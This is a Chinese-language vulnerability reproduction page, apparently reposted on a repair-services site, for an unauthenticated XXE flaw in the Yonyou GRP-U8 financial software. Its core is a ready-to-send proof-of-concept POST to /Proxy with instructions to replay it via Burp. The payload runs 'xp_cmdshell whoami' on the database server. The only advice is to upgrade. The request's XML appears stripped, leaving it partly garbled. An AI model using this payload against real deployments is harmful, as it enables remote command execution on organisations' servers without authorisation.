设为首页收藏本站
开启辅助访问

用友GRP

 您所在的位置:网站首页 用友grp-u8 用友GRP

用友GRP

#用友GRP| 来源: 网络整理| 查看: 265

0x00 漏洞描述

 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。

0x01 漏洞利用条件

无需登录

0x02 漏洞复现

POC:

POST /Proxy HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;) Host: localhost Content-Length: 341 Connection: Keep-Alive Cache-Control: no-cache cVer=9.8.0&dp=XMLAS_DataRequestProviderNameDataSetProviderDataDataexec xp_cmdshell 'whoami'

burp抓包,修改url为/Proxy,在body中添加payload

用友GRP-u8 XXE 漏洞复现 用友GRP-u8 XXE 漏洞复现 0x03 修复建议

升级最新版本



【本文地址】


今日新闻

推荐新闻

CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3